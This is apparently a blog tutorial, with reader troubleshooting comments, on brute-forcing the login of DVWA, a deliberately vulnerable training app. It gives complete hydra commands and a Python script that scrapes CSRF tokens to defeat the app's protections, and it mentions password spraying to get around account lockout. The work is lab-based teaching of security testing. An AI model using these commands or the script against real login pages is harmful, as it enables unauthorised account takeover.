Brute Forcing Web Logins with DVWA
In this tutorial, I will show you how to beat the Low, Medium and Hard levels of the brute force challenge within DVWA (Dame Vulnerable Web App).
If you want to follow along and have not yet got DVWA setup, take a look at this tutorial on Setting up a Vulnerable LAMP Server. This will run you through setting up a vulnerable virtual machine and installing DVWA. I have used this as bases for all my web hacking tutorials on Hemps T
I have been meaning to write this tutorial for a while after the popularity of a previous tutorial Brute Forcing Passwords with THC-Hydra. Which I cover using hydra to brute force a whole bunch of services exposed to the internet but in the brute forcing Webpage Login section I used a Firefox add-on called Tamper Data as the proxy to intercept the web requests and construct the hydra command.
The Problem is that Tamper Data no longer works in Firefox, this is since they transitioned to a new framework for developing Firefox extensions. This means we are going to have to use something else as a proxy and Intercept our web requests.
The best replacement for Tamper Data is to use Burp Suite as our proxy to capture the web requests we need to construct our hydra command.
Burp Suite
Burp Suite is a graphical tool for testing Web application security. Written in java, it has various tools that work seamlessly together to support the entire security testing process, from initial mapping and analysis of an application, through to finding and exploiting security vulnerabilities.
There are 3 different versions of Burp Suite. Enterprise, Professional and the free Community version as we are only going to need a fraction of burps potential in this tutorial, the free community version, should be just fine.
You can download burp suite for Linux, Mac, Windows or even in a Java JAR file which (It basically will run on anything that runs java) over at Portswigger site.
If you want more information about Burp Suite, check out this talk below “Web App Pen Testing with Burp Suite by Jason Nikola” from the recent SANS KringleCon.
Low Security
In the Low Security setting the DVWA Brute Force login prompt is just a straightforward HTTP GET request with no security in place to block or stop you from hammering it with hydra.
This will be exactly the same process I covered in Brute Forcing Passwords with THC-Hydra but this time I will be using Burp suite instead of Tamper Data to capture our requests.
Let’s get logged into DVWA which unless it’s been changed should be the standard username and password of admin/password and let’s make a start.
Step By Step Brute Force DVWA (Low Security)
- Set DVWA Security to Low
Start by making sure DVWA’s security is set to Low, do this by clicking the DVWA Security button on the left menu and selecting the security level drop down to Low and click submit.
- Click The Brute Force button
Click the Brute Force button on the menu on the left to enter the Brute Force Section of DVWA.
- Open Burp Suite and Setup Web proxy.
Open up Burp Suite, once Burp is loaded, click the Proxy tab then Options and make sure you have a Proxy Listener setup.
This should be set to your localhost 127.0.0.1:8080. You can adjust this how you need but if you are using this through your local web browser just leave these as default. - Turn Intercept On
Within Burp Suite move across to the intercept tab and make sure the Intercept button is on
Burp is now ready to start receiving requests and all we have left to do is set up Firefox to send its requests to the web server via Burp. - Network Settings in Firefox
Within Firefox type about
:preferences in the address bar this should take you directly to the preferences tab.
.
Scroll right down to the bottom of the page until you see Network Settings then click the settings tab. - Set Proxy
You should now be in the Connection settings within Firefox. Set the radio button to
manual proxy configuration. This needs to be set to your localhost on 127.0.0.1 and the port to 8080 unless you changed the port to something other than the default in step 3.
- Make a request.
Now the proxy is all configured we need to make a request to the DVWA Brute Force page.
In my example, I used a username UsEr and a Password PaSs then click the login button.
- Request Received by burp.
The request should get received by Burps Proxy.
Make a note of this request as we will need to use information from it to construct our Hydra command later. - Failed Login Message
In Burp Suite, click the forward button to forward our intercepted request on to the web server.
Due to not having entered the correct username and password, we get presented with an error message that states Username and/or password incorrect.
Add this to your notes you have just taken of the request in step 8 this allows us to tell hydra anything other then this error message must bea valid login. - Construct your hydra command
Use the data Intercepted by burp to construct your hydra command as I have done below.
hydra 192.168.0.20 -V -l admin -P ‘QuickPasswords.txt’ http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low”
I will break this hydra command down for you…
-V Verbose output showing the login + pass for each attempt in the terminal.
-l admin Login using the login name Provided This could be a capital -L to try against a list of usernames.
-P Load passwords from a file in my case this fileis called QuickPasswords.txt.http -get-form Tells hydra we want to use a get request and follows with the location of the form we want to brute force, this information was gathered from the details intercepted in step 8
username=^USER^&password=^PASS^ This adds place markers in our command where we want hydra to brute force the request (just replace where you see the actual username and Password used when logging in.: F=Username and/or password incorrect. This is the failure message noted from step 9 and tells hydra anything other then this message must be a valid login.
H=Cookie: This is the Cookie information which gets generated when youlogin to DVWA and is only really needed because of that initial login page on DVWA. In the realworld youwont normally be logged in to get to a login page. - Run Hydra Command
Run your hydra command, depending on the size of the password list used this should only take a few miniutes or so before it finds the correct password.
If you have issues with any of these steps above, please Leave me a comment at the bottom of this tutorial and I will give you any help you need to get you up and running.
Medium Security
The Medium Security setting extends the security from the low level by adding a time delay of 2 s
Re-run the Hydra command you used from Low Security, changing the security setting at the end of the command to medium.
hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=medium"The Hydra command still works it just takes a little longer to run. This is because the PHP has been adjusted to add the two
Luckily in DVWA we are easily able to check the PHP source code for all security levels, just click the view source button at the bottom of the DVWA Window. This will display the source PHP which shows the Login failed Sleep( 2 ) command as pictured below.
This shows adding a time delay on failed logins is not a deterrent or adequate protection from a brute force attack. The wait delay only increases the time needed to perform the attack, slowing down the attack speed.
High Security
Switching to the
If you just re-run the hydra command as we did with medium Security changing the security= at the end of the command too high as below..
hydra 192.168.0.20 -V -l admin -P '/home/vreality/Downloads/QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=high"Hydra’s output will error saying its found 16 valid passwords found.
before going any further let us use FireFox’s inspector element by right-clicking the webpage within firefox and choose Inspect Element and lets take a look at the
Drill down in Inspect Element until you find the HTML for the login form. notice there is now a hidden field with the name user_token being submitted with our GET request.
If you change the type=”hidden” to type=”text” you should see the hidden box render in your web browser.
If you remove all the characters from this un-hidden box and try to
Making burp intercept a login attempt shows the user_token with a string of alpha numeric characters added to the end of the GET request.
Forward on the intercepted request and have another go at logging in, notice that the user_token= has changed to another random alpha numeric string of characters.
This is the CSRF Token and is used to add credibility to the origin of the request being received by the server, this token is a impossible to guess random number generated by the server and is sent along with our GET request.
On the brute forcing page we are currently looking at, if the CSRF Token does not match, our request will error with the message “CSRF Token is incorrect” which we have just seen previously when we sent a request removing all the characters from the hidden user_token= field.
No longer can use hydra alone to brute force DVWA on the
There are a few different options for us to get around this, firstly we could use Burp this can be used to capture the CSRF token and run the brute force against the page using intruder tab in Burps menus but in the community edition using this feature only allows for a single thread to be run at a time greatly reducing Burp’s attack speed.
You can also combine Burp with Hydra, putting Hydra’s traffic through a proxy like Burp, This allows Burp to handle the requests and capturing the CSRF token, altering Hydra’s initial request, so it does not need to be aware of the CSRF Token and also bypasses Burps intruder limitations in the community edition.
Lastly we can have a go at creating our own brute forcing tool, which is the option i thought was most interesting and i will be covering below using python.
If you would like to see a tutorial for either using Burp or using Burp and Hydra to brute force DVWA on high security please let me know in the comments below and I will make a separate tutorial for these.
Using Python to Brute Force DVWA (High Security)
While researching for this tutorial I come across a post over on medium by Danny Beton https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39 where he covers step by step creating the python script that will allow you to capture the CSRF Token and brute force the login to DVWA on high security.
I did have to make a few changes to the original script from Danny’s page to get it working but only because I was having issues with the Password file adding 0x0n to the end of each brute force password attempt, I also wanted to see each password try
Below is my edited version of Danny’s Python script which i saved as DVWA-BruteForce.py.
from sys import argv
import requests
from BeautifulSoup import BeautifulSoup as Soup
# give our arguments more semantic friendly names
script, filename, success_message = argv
txt = open(filename)
# set up our target, cookie and session
url = 'http://192.168.0.20/dvwa/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID':'kjrkqb382512vao219va7sk0s4'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)
'''
checkSuccess
@param: html (String)
Searches the response HTML for our specified success message
'''
def checkSuccess(html):
# get our soup ready for searching
soup = Soup(html)
# check for our success message in the soup
search = soup.findAll(text=success_message)
if not search:
success = False
else:
success = True
# return the brute force result
return success
# Get the intial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source);
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
# Display before attack
print 'DVWA URL' + url
print 'CSRF Token='+ csrf_token
# Loop through our provided password file
with open(filename) as f:
print 'Running brute force attack...'
for password in f:
# Displays password tries and strips whitespace from password list
print 'password tryed: ' + password
password = password.strip()
# setup the payload
payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
r = s.get(url, cookies=cookie, params=payload)
success = checkSuccess(r.text)
if not success:
# if it failed the CSRF token will be changed. Get the new one
soup = Soup(r.text)
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
else:
# Success! Show the result
print 'Password is: ' + password
break
# We failed, bummer.
if not success:
print 'Brute force failed. No matches found.'You will need to download the Python modules beautyfulsoup and requests for the script above to work as these are not part of the default
BeautyfulSoup is a web scrapping library used to capture the CSRF token. Requests are what he used to make the requests to the web server. He also used argv to supply arguments to the script from the command line but this module already comes installed.
These modules can be installed using pip with the commands below.
sudo pip install requests
sudo pip install beautifulsoup
Also to get this to work you need to edit the URL = in the script to be the IP address of your DVWA web server, also you need to capture a PHPSESSID using Burp as we did previously in step 8 on the Low Security setting, add your PHPSESSID = to the script.
Run the Python Script using this command below adding the password list and the message which is received on a successful login.
python DVWA-BruteForce.py QuickPasswords.txt "Welcome to the password protected area admin"
If the Script works you should see an output like this..
Impossible Security
Brute Force and user enumeration should not be possible at the impossible security level in DVWA. There is now a lock out feature, where if there are five bad logins within 15 minutes the user account gets locked out.
If the locked out user tries to login, even with a valid password, it will say their username or password is incorrect. this should make it impossible to know there is a valid account on the system.
If time is not an issue we do have a couple of options here that would eventually brute force the login. We could Edit the python script we used on High Security and add a 15-minute wait after every 4 password tries. This would mean that you only try 16
The other option would be to use password spraying this is where you use one password against multiple users and because you are not hammering the hell out of a single user you end up
If you would like to see some more information about Password Sparying leave me a comment below and i will make sure i add it to the list of future posts.
HomeWork
Using every thing that you have just learnt from this tutorial and the BruteForcing Passwords with THC Hydra tutorial. Set the DVWA security to low and use Hydra to try and enumerate\Brute Force the other four user logins and post your findings in the comments section below.
References:
- https://blog.g0tmi1k.com/dvwa/bruteforce-medium/
- https://blog.g0tmi1k.com/dvwa/bruteforce-high/
- https://hd7exploit.wordpress.com/2017/05/28/dvwa-brute-force-high-level/
- https://medium.com/@dannybeton/dvwa-brute-force-tutorial-medium-5cd2fcfd7a8c
- https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39
- https://www.youtube.com/watch?v=3ljfZ68owVU
thanks man. first clear straight to the point no frills guide, im just starting to looking more serious into this stuff and trying to understand it from the basics on, cheers!
Hi DonPorno, Thanks for the comment.
That’s exactly why i made this guide if you have any questions drop me a comment on here or over on Social media.
Hemp
Nice
I just brute the DVWA at the high security level using the same command. But I use the login screen not the Brute Force login screen, using post method and without using cookies. Check my tutorial here which was adapted from yours and another one.
https://phoenyxacademy.com/how-to-brute-force-websites-logins-with-hydra-and-burpsuite/
Hi Faisel
Nice write up, The reason this works even on the hard setting is because the CSRF token is broken on the main DVWA login so medium and high security are basically the same.
If you are ever interested in guest writing a tutorial hit me up at [email protected].
Keep up the good work mate
Hemp
Thanks for your tutorial, is fantastic!!!!
Can you see me a tutorial for either using Burp or using Burp and Hydra to brute force DVWA on high security.
How you resolv error on Hydra’s output when found 16 valids passwords??
Thanks
Hi AVL
Thanks for your comment.
A tutorial on just using burp or burp using hydra through a proxy to brute force DVWA on high security is a good idea, Ill add it to my future tutorials list.
when you get the 16 valid passwords it usually means you have either got your hydra syntax wrong or in the case of DVWA on high security there is a CSRF token in place which hydra cant deal with alone.
Hope this helps.
Hemp
[ERROR]- optional parameter must start with a ‘/’ slash!
AT LOW SECURITY LEVEL
Hi Neel
Can you send me in the comments the Hydra command you are trying to run ???
Hemp
Hi
sir my burp suite no intercepting the traffic . I have configured it to no proxy and 127.0.0.1 8080 but it not capturing any thing.
without Cookies and Session id when I run the script it gives me wrong password and u-name pair?
my script is
hydra -vV -L usernames.txt -P passwords.txt 127.0.0.1 http-get-form ‘/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.’ -f
and the output is
root@kali:~# hydra -vV -L usernames.txt -P passwords.txt 127.0.0.1 http-get-form ‘/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.’ -f
Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2020-12-29 12:04:08
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:80//DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.
[VERBOSE] Resolving addresses … [VERBOSE] resolving done
[ATTEMPT] target 127.0.0.1 – login “admin” – pass “asdfgh” – 1 of 12 [child 0] (0/0)
[ATTEMPT] target 127.0.0.1 – login “admin” – pass “password” – 2 of 12 [child 1] (0/0)
[ATTEMPT] target 127.0.0.1 – login “admin” – pass “qwerty” – 3 of 12 [child 2] (0/0)
[ATTEMPT] target 127.0.0.1 – login “bob” – pass “asdfgh” – 4 of 12 [child 3] (0/0)
[ATTEMPT] target 127.0.0.1 – login “bob” – pass “password” – 5 of 12 [child 4] (0/0)
[ATTEMPT] target 127.0.0.1 – login “bob” – pass “qwerty” – 6 of 12 [child 5] (0/0)
[ATTEMPT] target 127.0.0.1 – login “khan” – pass “asdfgh” – 7 of 12 [child 6] (0/0)
[ATTEMPT] target 127.0.0.1 – login “khan” – pass “password” – 8 of 12 [child 7] (0/0)
[ATTEMPT] target 127.0.0.1 – login “khan” – pass “qwerty” – 9 of 12 [child 8] (0/0)
[ATTEMPT] target 127.0.0.1 – login “” – pass “asdfgh” – 10 of 12 [child 9] (0/0)
[ATTEMPT] target 127.0.0.1 – login “” – pass “password” – 11 of 12 [child 10] (0/0)
[ATTEMPT] target 127.0.0.1 – login “” – pass “qwerty” – 12 of 12 [child 11] (0/0)
[80][http-get-form] host: 127.0.0.1 login: bob password: password
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-12-29 12:04:09
Hi Abdur,
Are you saying that you cant capture any traffic with burp or just when you use hydra???
If you cant capture any traffic with burp make sure you have the proxy details setup in your Web browser.
If its the latter, you can use the Hydra_Proxy_HTTP or Hydra_Proxy command to proxy your hydra traffic through burp.
let me know how you get on.
Hemp
hello sir I am getting an error as a new to this webapp pentesting I am not able to resolve it please help
zsh: parse error near `&’
this is the error which I am getting
Hi, Ninjafurry Thanks for your comments…
What’s the command you are actually trying to run I think you may have a typo in there causing this parse error.
Check the command and if you are still getting this error copy and paste the command here and ill take a look at this for you.
Hemp
hydra 192.168.43.124 -V -l admin -P ‘/usr/share/wordlists/rockyou.txt’ http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=omi079qgij3pt6rhuojhs4a371; security=low”
This is the command I am trying
Your command is correct ….. Just check that the PHPSESSID= and IP address is still correct.
hmmm this is an interesting one do you get the same issue when you use a different program like curl…
try something like this curl https://192.168.43.124/dvwa/vulnerablitites/brute/ do you get the same error.
what O/S are you running? is it fully Updated?
Let me know how you get on…
Hemp
Yes PHPSESSID and IP is correct
while using curl i didn’t encounter any error ,
cat /etc/os-release
PRETTY_NAME=”Kali GNU/Linux Rolling”
NAME=”Kali GNU/Linux”
ID=kali
VERSION=”2021.1″
VERSION_ID=”2021.1″
VERSION_CODENAME=”kali-rolling”
ID_LIKE=debian
ANSI_COLOR=”1;31″
HOME_URL=”https://www.kali.org/”
SUPPORT_URL=”https://forums.kali.org/”
BUG_REPORT_URL=”https://bugs.kali.org/”
Damn it looks all up to date too …. maybe there is a problem with the repo version of hydra. Have you tried installing the latest version 9.1 from their Git hub https://github.com/vanhauser-thc/thc-hydra/releases.
Regards,
also, how did you setup DVWA, did you follow my guide on Setting up a Vulnerable LAMP Server
Hemp
my hydra is already latest version 9.1 , and I configured dvwa on local network . I tried to find some solution like ! / but can’t solve the error which is coming
nope I didn’t follow your instruction to configure dvwa I think the problem is on terminal should I change zsh to bash and try . Or should I try your dvwa setup instruction ?
You know, I should have realized you were not using bash…. yeah try it in bash…
i found a way but not sure is it right or worong if you can confirm it then it will be very helpful
sudo hydra 192.168.43.124 -V -l admin -P “/usr/share/wordlists/rockyou.txt” http-get-form ‘dvwa/vulnerbality/brute/:username=^USER^;password=^PASS^;Login=Login:F=Username and/or password incorrect,:H=Cookie: PHPSESSID=token; security=low’
as I am new to this
Congrats that’s the start to becoming a hacker, Tweaking the command to work for your situation.
Did you get the desired result?
I’ve compared the two commands you sent me and the only difference I can see is you added sudo to the command and switched the backticks around.
sudo hydra 192.168.43.124 -V -l admin -P “/usr/share/wordlists/rockyou.txt” http-get-form ‘dvwa/vulnerbality/brute/:username=^USER^;password=^PASS^;Login=Login:F=Username and/or password incorrect,:H=Cookie: PHPSESSID=token; security=low’
Interested to know though, if the failed response in burp on low security is now “Username and/or password incorrect, (with a comma)”… or if it was just a typo.
Just remember Ninjafurry everyone starts somewhere and it’s all about Journey You take.
Drop me a message here anytime mate and I will try and help if I can.
Hemp
I’m having a confusing experience – my password guesses are just hanging. If I add errors to the hydra command, I get 16 false positives. However, if the command is correct, it just returns a message that it is attempting the same 16 requests, but extends the time period for the response (see below):
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -V 192.168.2.116 http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb2”
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-15 17:36:44
[WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get-form://192.168.2.116:80/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb2
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “123456” – 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “12345” – 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “123456789” – 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “password” – 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “iloveyou” – 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “princess” – 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “1234567” – 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “rockyou” – 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “12345678” – 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “abc123” – 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “nicole” – 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “daniel” – 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “babygirl” – 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “monkey” – 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “lovely” – 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “jessica” – 16 of 14344399 [child 15] (0/0)
[STATUS] 16.00 tries/min, 16 tries in 00:01h, 14344383 to do in 14942:04h, 16 active
[STATUS] 5.33 tries/min, 16 tries in 00:03h, 14344383 to do in 44826:12h, 16 active
…
Hi Tom
Thanks for your comment, Getting the syntax correct on this can be a right pain.
Try swapping the security and PHPSESSID around…
Your Command
/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb
Try This !
‘/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb; security=low‘
Making sure you keep an eye on the spaces between PHPSESSID and Security.
Let me know how you get on?
Hemp
Hi there,
I am doing the same thing as you have mentioned as my ethical hacking project brute force project part. But my result is not appearing and is keep on showing the status and tries and nothing happens. Could you please help.
I am struggling with this issue.
Hi Ambreen
Could you please paste the command you are using in the comments???
I can then take a look and hopefully be able to work out what the issue is.
Hemp
Thanks, for you reply. The problem has been resolved now. Hydra 9.1 is buggy, I have upgrade it to 9.2, and it is working all good now.
Hi, Could you please help
hydra 127.0.0.1 -V -l admin -P ‘Quickpasswords.txt’ http-get-form “/dvwa/vulnerabilities/brute/?username=USER&password=PASS&Login=Login:F=Username and/or password incorrect.:H=Cookie:PHPSEED=etl6p7687vhql1ssfnmmpcdk80;security=low”
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-23 10:55:50
[ERROR] the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: F=Username and/or password incorrect.
I got this error at the security level = low. Please help
Hi Priya
The http-get-form syntax is very unforgiving however The error message is stating that you have not added the ^USER^ and ^PASS^ tags to your command, see my example below.
hydra 192.168.0.20 -V -l admin -P ‘QuickPasswords.txt’ http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low”
Also, Make sure you keep an eye on the spacing at the end of the command (:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low)
If you have not already, check out my more in-depth tutorial on brute-forcing passwords with hydra here
Hope this helps, come back and let me know how you get on.
Hemp